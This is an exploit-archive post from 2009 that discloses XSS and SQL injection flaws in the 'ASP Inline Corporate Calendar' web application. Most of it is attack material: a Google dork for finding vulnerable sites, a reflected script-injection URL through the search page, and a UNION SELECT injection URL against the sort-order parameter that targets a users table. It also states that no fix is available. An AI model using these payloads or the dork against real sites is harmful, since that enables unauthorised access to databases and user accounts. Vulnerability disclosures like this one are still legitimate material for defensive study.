ASP Inline Corporate Calendar (SQL-XSS) Multiple Remote Vulnerabilities

2009-05-21 17:33:19

000000 00000 0000 0000 000 00 000000 0000000 0000 000000 00000
0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0
0 0 0 0 00 0 0 0 0 0 0 0 0 00 0 0 0 0 0
0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0
00000 0 0 0 0 0 0 0 0 00000 0000 0 0 0 0 00000 0 0
0 0 0 0 0 0 0 0 000 0 0 0 0 0 0 0 0 0 0 0 0
0 0 0 0 000 0 0 0 0 0 0 0 000 0 0 0 0
0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0
000000 0000000 000 0000 000 00 000000 0000000 000 000 00 00000



[+] Script : ASP Talk

[+] Exploit Type : Multiple Exploits (SQL/CSS)

[+] Google Dork : intitle:"ASP inline corporate calendar" inurl:.asp?id=

[+] Contact : blackbeard-sql A.T hotmail.fr

--//--> Exploit :

1)Cross site scripting :

http://[website]/[script]/search.asp?keyword=<script>alert('bl@ckbe@rd');</script>&SearchIn=All

post = <script>alert('Bl@clbe@rD Is Here');</script>

2) Remote sql injection Exploit :

http://[website]/[script]/active_appointments.asp?sortby=Event_Title&order=DESC+union+select+(number of columns)+from+users

[peace xD]

#

Fixes

No fixes

In order to submit a new fix you need to be registered.